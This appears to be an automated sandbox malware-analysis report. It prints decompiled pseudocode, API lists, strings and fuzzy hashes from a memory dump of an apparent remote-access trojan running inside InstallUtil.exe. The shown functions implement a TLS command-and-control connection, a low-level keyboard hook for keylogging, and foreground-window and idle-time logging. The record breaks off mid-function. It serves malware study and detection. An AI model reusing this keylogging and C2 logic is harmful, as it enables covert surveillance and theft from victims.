0x00412fc9
0x00412fdd
0x00412fdd
0x00412fe5
0x00412fe5
0x00412fee
0x00000000

APIs

Sleep.KERNEL32(00000000,00000029,76EC43E0,0046E600,00000000), ref: 00412554
WSAGetLastError.WS2_32(00000000,00000001), ref: 00412765
Sleep.KERNELBASE(00000000,00000002), ref: 00412FE5

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

Strings

name, xrefs: 0041293C
Cv, xrefs: 00412F93
Connection Error: Unable to create socket, xrefs: 004127C3
Connection Error: , xrefs: 00412778
3.5.1 Pro, xrefs: 00412A5B
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, xrefs: 00412976
Disconnected, xrefs: 00412F5D
Exe, xrefs: 00412998
| , xrefs: 004126EB, 0041282C
%I64u, xrefs: 004128CF
Connecting | , xrefs: 004126E1
TLS On , xrefs: 004126CC
TLS Off, xrefs: 004126BE
Connected | , xrefs: 00412827

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$3.5.1 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$TLS Off$TLS On $name$Cv
API String ID: 524882891-3186453305
Opcode ID: c21f36a0ff83c0d172256f3d5d64dbbaee89fb63f94fa55c32b6ef31a1cc3040
Instruction ID: dd2691d483a93dc2e8991264f89b2e80d2ae936469f5f19057ec07884e741be9
Opcode Fuzzy Hash: c21f36a0ff83c0d172256f3d5d64dbbaee89fb63f94fa55c32b6ef31a1cc3040
Instruction Fuzzy Hash: 32428F31A001195ACB18F732DD66AEE73759F51308F5040BFB40AB61E2EF781E868A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040489F Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E0040489F(void* __ecx, void* __esi) {
				char _v32;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t21;
				int _t22;
				void* _t26;
				signed int _t31;
				void* _t32;
				void* _t33;
				struct _SECURITY_ATTRIBUTES* _t34;
				void* _t42;
				void* _t43;
				void* _t51;
				struct _SECURITY_ATTRIBUTES* _t56;
				void* _t58;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t103;
				void* _t104;

				_t84 = __esi;
				_t21 =  *0x46dacc; // 0x0
				_t87 = _t86 - 0x1c;
				_t82 = __ecx;
				_t3 = _t82 + 4; // 0xffffffff, executed
				__imp__#4( *_t3,  *((intOrPtr*)(_t21 + 0x18)),  *((intOrPtr*)(_t21 + 0x10)), _t81, _t51); // executed
				if(_t21 != 0) {
					__eflags =  *((char*)(__ecx + 0x31));
					if( *((char*)(__ecx + 0x31)) != 0) {
						__imp__#111();
						_t56 = _t21 - 0x2736;
						__eflags = _t56;
						if(_t56 != 0) {
							__eflags = _t56 == 0x17;
							if(_t56 == 0x17) {
								_t88 = _t87 - 0x18;
								_t58 = _t87 - 0x18;
								_push("Connection Refused");
								goto L20;
							} else {
								_t26 = E0041925A( &_v32, _t21);
								_t91 = _t87 - 0x18;
								E004052D4(_t51, _t87 - 0x18, "Connection Failed: ", _t85, __eflags, _t26);
								E00402053(_t51, _t91 - 0x14, "Connection Failed: ", _t85, "E");
								E00417D02(_t51, _t82);
								E00401F98();
							}
						}
					}
					goto L21;
				} else {
					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
						L14:
						_t22 = 1;
					} else {
						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
							_t103 = _t87 - 0x18;
							_t6 = _t82 + 0x34; // 0x46e2ac
							_t77 = "TLS Handshake...      | ";
							E004052F5(_t103, "TLS Handshake...      | ", _t85, _t6);
							_t104 = _t103 - 0x14;
							E00402053(_t51, _t104, "TLS Handshake...      | ", _t85, "i");
							E00417D02(_t51, _t82);
							_t87 = _t104 + 0x30;
						}
						_t31 = E0041D7D4(_t51);
						 *(_t82 + 0x4c) = _t31;
						if(_t31 != 0) {
							_t8 = _t82 + 4; // 0xffffffff
							_t80 =  *_t8;
							_t32 = E0041DA03(_t31,  *_t8);
							__eflags = _t32 - 1;
							if(_t32 == 1) {
								_t33 = E0041E5FE();
								__eflags = _t33 - 1;
								if(_t33 == 1) {
									_t34 = E0041D97A(_t51);
									 *((intOrPtr*)(_t82 + 0x50)) = _t34;
									__eflags = _t34;
									if(_t34 == 0) {
										_t94 = _t87 - 0x18;
										E00402053(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 3");
										E00402053(_t51, _t94 - 0x18, _t80, _t85, "E");
										E00417D02(_t51, _t82);
									}
									__eflags = 0;
									 *((intOrPtr*)(_t82 + 0x70)) = CreateEventW(0, 0, 1, 0);
									 *((intOrPtr*)(_t82 + 0x6c)) = CreateEventW(0, 0, 1, 0);
									goto L14;
								} else {
									_t97 = _t87 - 0x18;
									E00402053(_t51, _t87 - 0x18, _t80, _t85, "TLS Authentication Failed");
									E00402053(_t51, _t97 - 0x18, _t80, _t85, "E");
									_t42 = E00417D02(_t51, _t82);
									_t13 = _t82 + 0x4c; // 0x0
									_t43 = E0041DC26(_t42,  *_t13);
									goto L8;
								}
							} else {
								_t100 = _t87 - 0x18;
								E00402053(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 2");
								E00402053(_t51, _t100 - 0x18, _t80, _t85, "E");
								_t43 = E00417D02(_t51, _t82);
								L8:
								_t9 = _t82 + 0x4c; // 0x0
								E0041D814(_t43, _t51,  *_t9, _t80, _t82, _t84);
								 *(_t82 + 0x4c) =  *(_t82 + 0x4c) & 0x00000000;
								goto L21;
							}
						} else {
							_t88 = _t87 - 0x18;
							_t58 = _t87 - 0x18;
							_push("TLS Error 1");
							L20:
							E00402053(_t51, _t58, _t77, _t85);
							E00402053(_t51, _t88 - 0x18, _t77, _t85, "E");
							E00417D02(_t51, _t82);
							L21:
							_t22 = 0;
						}
					}
				}
				return _t22;
			}

0x0040489f
0x004048a2
0x004048a7
0x004048af
0x004048b4
0x004048b7
0x004048bf
0x004049f2
0x004049f6
0x004049f8
0x00404a00
0x00404a00
0x00404a06
0x00404a08
0x00404a0b
0x00404a48
0x00404a4b
0x00404a4d
0x00000000
0x00404a0d
0x00404a12
0x00404a17
0x00404a22
0x00404a31
0x00404a36
0x00404a41
0x00404a41
0x00404a0b
0x00404a06
0x00000000
0x004048c5
0x004048c8
0x004049ee
0x004049ee
0x004048ce
0x004048d1
0x004048d3
0x004048d6
0x004048db
0x004048e1
0x004048e6
0x004048f0
0x004048f5
0x004048fa
0x004048fa
0x004048fd
0x00404902
0x00404907
0x00404918
0x00404918
0x0040491d
0x00404922
0x00404925
0x00404961
0x00404966
0x00404969
0x0040499e
0x004049a3
0x004049a6
0x004049a8
0x004049aa
0x004049b4
0x004049c3
0x004049c8
0x004049cd
0x004049d0
0x004049e2
0x004049eb
0x00000000
0x0040496b
0x0040496b
0x00404975
0x00404984
0x00404989
0x0040498e
0x00404994
0x00000000
0x00404994
0x00404927
0x00404927
0x00404931
0x00404940
0x00404945
0x0040494d
0x0040494d
0x00404950
0x00404955
0x00000000
0x00404955
0x00404909
0x00404909
0x0040490c
0x0040490e
0x00404a52
0x00404a52
0x00404a61
0x00404a66
0x00404a6e
0x00404a6e
0x00404a6e
0x00404907
0x004048c8
0x00404a75

APIs

connect.WS2_32(FFFFFFFF,?,?), ref: 004048B7
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052E2,?,Keylogger initialization failure: error ,?,00408AC8,00000000), ref: 004049D7
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052E2,?,Keylogger initialization failure: error ,?,00408AC8,00000000), ref: 004049E5
WSAGetLastError.WS2_32(?,004052E2,?,Keylogger initialization failure: error ,?,00408AC8,00000000), ref: 004049F8

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

Strings

R@, xrefs: 004048AA
TLS Error 1, xrefs: 0040490E
Connection Failed: , xrefs: 00404A1A
TLS Error 3, xrefs: 004049AF
TLS Error 2, xrefs: 0040492C
TLS Handshake... | , xrefs: 004048DB
Connection Refused, xrefs: 00404A4D
TLS Authentication Failed, xrefs: 00404970

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... | $R@
API String ID: 994465650-3185988060
Opcode ID: 63342f0192dee1e784b5ec474e351367c7b5c33f2b130e557f670a94ef39ff7e
Instruction ID: 707485a4b14cc15d26f85242ace4de7c6ed769eeea86a0797bc035552a01cbba
Opcode Fuzzy Hash: 63342f0192dee1e784b5ec474e351367c7b5c33f2b130e557f670a94ef39ff7e
Instruction Fuzzy Hash: B44127F1B0021667CB14777A9A0B56F7A21AB82348B40417FF601576D2EBBEA811C7DF

Uniqueness

Uniqueness Score: -1.00%

Function 00404DFD Relevance: 18.1, APIs: 12, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00404DFD(void* __edx) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t29;
				int _t32;
				long _t33;
				long _t36;
				void* _t44;
				void* _t48;
				void* _t50;
				void* _t51;

				_t48 = __edx;
				_t51 = WaitForSingleObject;
				_t50 = _t44;
				_t1 = _t50 + 0x68; // 0x0
				_t29 = WaitForSingleObject( *_t1, 0xffffffff);
				if( *(_t50 + 4) != 0xffffffff) {
					_t5 = _t50 + 4; // 0xffffffff, executed
					__imp__#3( *_t5); // executed
					if(_t29 == 0) {
						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
					}
					_t45 = _t50;
					if(E004046B3(_t50) != 0) {
						E004050BB(_t45, _t51, 1);
					}
					if( *((char*)(_t50 + 1)) != 0) {
						_t9 = _t50 + 0x70; // 0x0
						_t33 = WaitForSingleObject( *_t9, 0xffffffff);
						_t10 = _t50 + 0x50; // 0x0
						E0041D814(_t33, CloseHandle,  *_t10, _t48, SetEvent, _t50);
						_t11 = _t50 + 0x70; // 0x0
						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
						SetEvent( *_t11);
						_t14 = _t50 + 0x6c; // 0x0
						_t36 = WaitForSingleObject( *_t14, 0xffffffff);
						_t15 = _t50 + 0x4c; // 0x0
						E0041D814(_t36, CloseHandle,  *_t15, _t48, SetEvent, _t50);
						_t16 = _t50 + 0x6c; // 0x0
						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
						SetEvent( *_t16);
						_t19 = _t50 + 0x70; // 0x0
						CloseHandle( *_t19);
						_t20 = _t50 + 0x6c; // 0x0
						CloseHandle( *_t20);
						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
					}
					_t25 = _t50 + 0x68; // 0x0
					SetEvent( *_t25);
					_t26 = _t50 + 0x68; // 0x0
					_t32 = CloseHandle( *_t26);
				} else {
					_t3 = _t50 + 0x68; // 0x0
					SetEvent( *_t3);
					_t4 = _t50 + 0x68; // 0x0, executed
					_t32 = FindCloseChangeNotification( *_t4); // executed
				}
				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
				return _t32;
			}

0x00404dfd
0x00404e00
0x00404e08
0x00404e0c
0x00404e0f
0x00404e15
0x00404e2e
0x00404e31
0x00404e39
0x00404e3b
0x00404e3b
0x00404e3f
0x00404e48
0x00404e4c
0x00404e4c
0x00404e61
0x00404e65
0x00404e68
0x00404e6a
0x00404e6d
0x00404e72
0x00404e75
0x00404e79
0x00404e7d
0x00404e80
0x00404e82
0x00404e85
0x00404e8a
0x00404e8d
0x00404e91
0x00404e93
0x00404e96
0x00404e98
0x00404e9b
0x00404e9d
0x00404ea1
0x00404ea1
0x00404ea5
0x00404ea8
0x00404eaa
0x00404ead
0x00404e17
0x00404e17
0x00404e1a
0x00404e20
0x00404e23
0x00404e23
0x00404eaf
0x00404eb8

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E278,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E0F
SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E1A
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E23
closesocket.WS2_32(FFFFFFFF), ref: 00404E31
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E68
SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E79
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E80
SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E91
CloseHandle.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E96
CloseHandle.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E9B
SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404EA8
CloseHandle.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404EAD

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
String ID:
API String ID: 2403171778-0
Opcode ID: 0295a8338913ef8802205e3f9f6b61c865046404e0355dd36bdd1f347f13266f
Instruction ID: 5d72978d93b020a25bf4dcb913a2cdf37b769b979e949170859b26b21b6a485d
Opcode Fuzzy Hash: 0295a8338913ef8802205e3f9f6b61c865046404e0355dd36bdd1f347f13266f
Instruction Fuzzy Hash: 2F213A71000B10AFDB216B26DC09B17BBE1EF8032AF104A2DF1A215AF1CB75E851DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409361 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00409361(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				void* __ebp;
				struct HWND__* _t35;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				void* _t125;
				signed int _t126;
				void* _t128;

				_t112 = __edx;
				_t128 = (_t126 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4); // executed
					_t35 = GetForegroundWindow(); // executed
					_t77 = _t35;
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					E00409FA7(_t77,  &_v100, _t112, _t119, _t125, _t4, 0);
					if(_t36 != 0) {
						_t57 = E0040243C();
						GetWindowTextW(_t77, E00401EC4( &_v100), _t57);
						_t112 = 0x46ff6c;
						if(E0040A060(0x46ff6c) == 0) {
							E00409F8F(0x46ff6c,  &_v100);
							E00407727(E0040243C() - 1);
							_t128 = _t128 - 0x18;
							_t137 =  *0x46e3f3;
							if( *0x46e3f3 == 0) {
								_t112 = E0040A01F( &_v76, L"\r\n[", _t125,  &_v108);
								E00402FD4(_t77, _t128, _t67, _t119, _t125, __eflags, L"]\r\n");
								E00408D60(_t119);
								E00401EC9();
							} else {
								E0040773A(_t77, _t128, 0x46ff6c, _t137,  &_v108);
								E004097F2(_t77, _t119, _t137);
							}
						}
					}
					_t83 = _t119;
					E00409DD6(_t119);
					if(E00418281(_t119) < 0xea60) {
						L18:
						E00401EC9();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E00418281(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0043DDD1(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E0040793B(_t77,  &_v80, E004052D4(_t77,  &_v56, "\r\n{ User has been idle for ", _t125, __eflags, E00402053(_t77,  &_v28, _t77 % 0xea60, _t125,  &_v112)), _t119, _t125, __eflags, " minutes }\r\n");
								_t128 = _t128 + 0xc - 0x14;
								_t112 = _t50;
								E00418385(_t128, _t50);
								E00408D60(_t119);
								E00401F98();
								E00401F98();
								E00401F98();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						E00401EC9();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}

0x00409361
0x00409367
0x0040936a
0x0040936b
0x0040936d
0x0040936f
0x004093ce
0x004093d4
0x004093da
0x004093dd
0x004093e7
0x004093ef
0x004093f6
0x00409400
0x00409411
0x00409417
0x00409427
0x00409433
0x00409447
0x0040944c
0x00409453
0x0040945a
0x00409484
0x00409488
0x00409490
0x00409499
0x0040945c
0x0040945f
0x00409466
0x00409466
0x0040945a
0x00409427
0x0040949e
0x004094a0
0x004094b1
0x00409559
0x0040955d
0x00000000
0x004094b7
0x004094b7
0x004094bb
0x004094cb
0x004094d2
0x004094f2
0x004094f5
0x00409526
0x0040952b
0x0040952e
0x00409532
0x00409539
0x00409542
0x0040954b
0x00409554
0x00000000
0x00409554
0x004094d4
0x004094db
0x004094df
0x004094df
0x0040956b
0x00000000
0x0040956b
0x004094b1
0x00409572
0x00409578

APIs

__Init_thread_footer.LIBCMT ref: 004093C3
Sleep.KERNELBASE(000001F4), ref: 004093CE
GetForegroundWindow.USER32 ref: 004093D4
GetWindowTextLengthW.USER32(00000000), ref: 004093DD
GetWindowTextW.USER32 ref: 00409411
Sleep.KERNEL32(000003E8), ref: 004094DF

Part of subcall function 00408D60: SetEvent.KERNEL32(?,?,?,00409EBD,?,?,?,?,?,00000000), ref: 00408D8C

Strings

[, xrefs: 00409479
{ User has been idle for , xrefs: 00409511
], xrefs: 00409473
minutes }, xrefs: 00409505

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: e239597757f8afaf23ce4b67698eaa7f699650f6c7a6796878c1ff69424883ef
Instruction ID: 84067fbe4e5e7cfc0d65f044a5cd870ffbd1248faa41864e0f65aeb095895f00
Opcode Fuzzy Hash: e239597757f8afaf23ce4b67698eaa7f699650f6c7a6796878c1ff69424883ef
Instruction Fuzzy Hash: 1A51AF716082405BC714FB21D856A6FB7A5AF89308F44053FF882A22E3EF7C9D45C69B

Uniqueness

Uniqueness Score: -1.00%

Function 0041905E Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0041905E(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				void* __ebp;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;
				void* _t82;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				E00401F46(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t86 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M0041923A))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = E00417DC7(__ebx,  &_v620, __edx);
							__ecx =  &_v644;
							__eax = E00401ED3( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = E004186B9(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040413E(__ebx, __ecx, __edx, __ebp, L"\\SysWOW64") = E00438A0F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00402F65( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401ED3( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = E00401EC9();
								__ecx =  &_v608;
								__eax = E00401EC9();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040413E(__ebx, __ecx, __edx, __ebp, L"\\system32") = E00438A0F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00402F65( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401ED3( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = E00401EC9();
								__ecx =  &_v608;
								__eax = E00401EC9();
								__ecx =  &_v584;
								L5:
								__eax = E00401EC9();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile"); // executed
							L14:
							_t51 = E00438A0F(_t54, _t57, _t86); // executed
							L00409F8A(_t54,  &_v644, _t73, _t51);
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(E00401EC4( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040413E(_t54,  &_v560, _t73, _t82, _a4);
				_t40 = E0040413E(_t54,  &_v636, _t73, _t82, "\\");
				E00402F65(_t77, E00402F65( &_v600, E0041945E(_t54,  &_v616, _t73, _t82, _t86,  &_v544, _t38), _t40), _t39);
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				return _t77;
				goto L16;
			}

0x0041905e
0x0041906d
0x0041906f
0x00419075
0x0041907d
0x00419080
0x00419083
0x00419089
0x00000000
0x00419090
0x00000000
0x00000000
0x0041909a
0x0041909e
0x004190a4
0x004190a8
0x00000000
0x00000000
0x004190bb
0x00000000
0x00000000
0x004190c5
0x00000000
0x00000000
0x004190cf
0x004190d4
0x004190d6
0x0041912f
0x0041913e
0x00419145
0x0041914e
0x00419150
0x00419154
0x0041915b
0x0041915f
0x00419164
0x00419168
0x0041916d
0x00419171
0x004190ad
0x004190ad
0x00000000
0x004190d8
0x004190dd
0x004190ec
0x004190f3
0x004190fc
0x004190fe
0x00419102
0x00419109
0x0041910d
0x00419112
0x00419116
0x0041911b
0x0041911f
0x00419124
0x004190b1
0x004190b1
0x00000000
0x004190b1
0x00000000
0x00000000
0x0041917b
0x00000000
0x00000000
0x00419182
0x00000000
0x00000000
0x00419189
0x0041918e
0x0041918e
0x00419199
0x00000000
0x00000000
0x00419089
0x0041919e
0x004191b5
0x004191c4
0x004191d3
0x004191fb
0x00419205
0x0041920e
0x00419217
0x00419220
0x00419229
0x00419236
0x00000000

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004191B5

Strings

WinDir, xrefs: 004190C5, 004190E7, 00419139
\SysWOW64, xrefs: 0041912A
Temp, xrefs: 00419090
ProgramFiles, xrefs: 0041917B
AppData, xrefs: 00419182
SystemDrive, xrefs: 004190BB
\system32, xrefs: 004190D8
UserProfile, xrefs: 00419189

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-1609423294
Opcode ID: a20092cf446a1e024e852ecdcfb79795042d4ca980e1efba7e91b68b2337585c
Instruction ID: 9e4c647ec7685b194a43107814288911539900394b17977f9ebe9b62d2eba58c
Opcode Fuzzy Hash: a20092cf446a1e024e852ecdcfb79795042d4ca980e1efba7e91b68b2337585c
Instruction Fuzzy Hash: 0841677211C3456AC204FB21DC56CEFB3A8AE9531DF10053FF442620E2EE786D8AC65B

Uniqueness

Uniqueness Score: -1.00%

Function 00408A72 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00408A72(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				void* __ebp;
				struct HHOOK__* _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				void* _t36;
				signed int _t37;
				void* _t39;

				_t39 = (_t37 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x46dae8 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E00408A5E, GetModuleHandleA(0), 0); // executed
					 *_t34 = _t14;
					_t44 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0); // executed
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E004182D1(_t22,  &_v60, GetLastError());
						_t40 = _t39 - 0x18;
						E004052D4(_t22, _t39 - 0x18, "Keylogger initialization failure: error ", _t36, _t44, _t16);
						E00402053(_t22, _t40 - 0x14, "Keylogger initialization failure: error ", _t36, "E");
						E00417D02(_t22, 0);
						E00401F98();
						_t8 = 1;
					}
				}
				return _t8;
			}

0x00408a78
0x00408a7c
0x00408a81
0x00408a89
0x00000000
0x00408a8b
0x00408a9b
0x00408aa1
0x00408aa3
0x00408aa5
0x00408aed
0x00408aed
0x00408af5
0x00408afb
0x00408afd
0x00000000
0x00000000
0x00408b04
0x00408b0f
0x00408b15
0x00408b17
0x00000000
0x00000000
0x00000000
0x00408b17
0x00408b19
0x00408b19
0x00408aa7
0x00408ab3
0x00408ab8
0x00408ac3
0x00408ad2
0x00408ad7
0x00408ae3
0x00408aea
0x00408aea
0x00408aa5
0x00408b20

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00408A8D
SetWindowsHookExA.USER32 ref: 00408A9B
GetLastError.KERNEL32 ref: 00408AA7

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

KiUserCallbackDispatcher.NTDLL ref: 00408AF5
TranslateMessage.USER32(?), ref: 00408B04
DispatchMessageA.USER32 ref: 00408B0F

Strings

Keylogger initialization failure: error , xrefs: 00408ABB

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Message$CallbackDispatchDispatcherErrorHandleHookLastLocalModuleTimeTranslateUserWindows
String ID: Keylogger initialization failure: error
API String ID: 941179788-952744263
Opcode ID: 80e9c3719d5138d5a7aeeeff26dddd61ebee18b289506c455043542e035c4785
Instruction ID: 09a998a08c51662740e195c7b0c037219e3fb6e082e02c56b64d3784da25797e
Opcode Fuzzy Hash: 80e9c3719d5138d5a7aeeeff26dddd61ebee18b289506c455043542e035c4785
Instruction Fuzzy Hash: EC11EF317003016BCB00BBB69D0986B77FCEBD1719B50097FB881D25A1EE34C540CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00408E50 Relevance: 9.2, APIs: 6, Instructions: 169
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00408E50(void* __ecx, char* __edx) {
				char _v1028;
				char _v1040;
				char _v1064;
				char _v1076;
				void* _v1080;
				void* _v1088;
				void* _v1092;
				char _v1100;
				char _v1124;
				void* _v1132;
				char _v1136;
				void* _v1152;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t32;
				char* _t34;
				void* _t36;
				int _t40;
				void* _t47;
				char* _t51;
				int _t64;
